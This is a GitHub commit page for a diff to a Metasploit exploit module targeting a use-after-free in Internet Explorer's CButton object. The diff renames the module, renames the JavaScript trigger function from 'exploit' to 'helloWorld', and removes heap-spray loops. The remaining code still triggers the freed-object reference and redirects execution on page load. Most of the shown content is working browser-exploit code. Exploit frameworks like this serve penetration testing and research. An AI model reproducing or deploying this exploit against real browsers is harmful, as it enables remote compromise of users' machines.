Skip to content
This repository
Browse code

Your def of commit apparently is a little different than mine, git.

  • Loading branch information...
commit f7543e18fe735bf50f9b4127eec6dd74c0f2d2bd 1 parent 2b3f7c4
sinn3r authored December 31, 2012
37  modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
15 15
 
16 16
 	def initialize(info={})
17 17
 		super(update_info(info,
18  
-			'Name'           => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
  18
+			'Name'           => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
19 19
 			'Description'    => %q{
20 20
 					This module exploits a vulnerability found in Microsoft Internet Explorer. A
21 21
 				use-after-free condition occurs when a CButton object is freed, but a reference
@@ -187,37 +187,11 @@ def load_exploit_html(my_target, cli)
187 187
 		<script>
188 188
 		#{js}
189 189
 
190  
-		function exploit()
  190
+		function helloWorld()
191 191
 		{
192 192
 			var e0 = null;
193 193
 			var e1 = null;
194 194
 			var e2 = null;
195  
-			var arrObject = new Array(3000);
196  
-			var elmObject = new Array(500);
197  
-			for (var i = 0; i < arrObject.length; i++)
198  
-			{
199  
-				arrObject[i] = document.createElement('div');
200  
-				arrObject[i].className = unescape("ababababababababababababababababababababa");
201  
-			}
202  
-
203  
-			for (var i = 0; i < arrObject.length; i += 2)
204  
-			{
205  
-				arrObject[i].className = null;
206  
-			}
207  
-
208  
-			CollectGarbage();
209  
-
210  
-			for (var i = 0; i < elmObject.length; i ++)
211  
-			{
212  
-				elmObject[i] = document.createElement('button');
213  
-			}
214  
-
215  
-			for (var i = 1; i < arrObject.length; i += 2)
216  
-			{
217  
-				arrObject[i].className = null;
218  
-			}
219  
-
220  
-			CollectGarbage();
221 195
 
222 196
 			try {
223 197
 				e0 = document.getElementById("a");
@@ -230,19 +204,14 @@ def load_exploit_html(my_target, cli)
230 204
 				e2.appendChild(document.createElement('body'));
231 205
 			} catch(e) { }
232 206
 			CollectGarbage();
233  
-			for(var i =0; i < 20; i++)
234  
-			{
235  
-				arrObject[i].className = unescape("ababababababababababababababababababababa");
236  
-			}
237 207
 			var eip = window;
238 208
 			var data = "#{Rex::Text.rand_text_alpha(41)}";
239 209
 			eip.location = unescape("%u0b30%u0c0c" + data);
240  
-
241 210
 		}
242 211
 
243 212
 		</script>
244 213
 		</head>
245  
-		<body onload="eval(exploit())">
  214
+		<body onload="eval(helloWorld())">
246 215
 		<form id="a">
247 216
 		</form>
248 217
 		<dfn id="b">

0 notes on commit f7543e1

Please sign in to comment.
Something went wrong with that request. Please try again.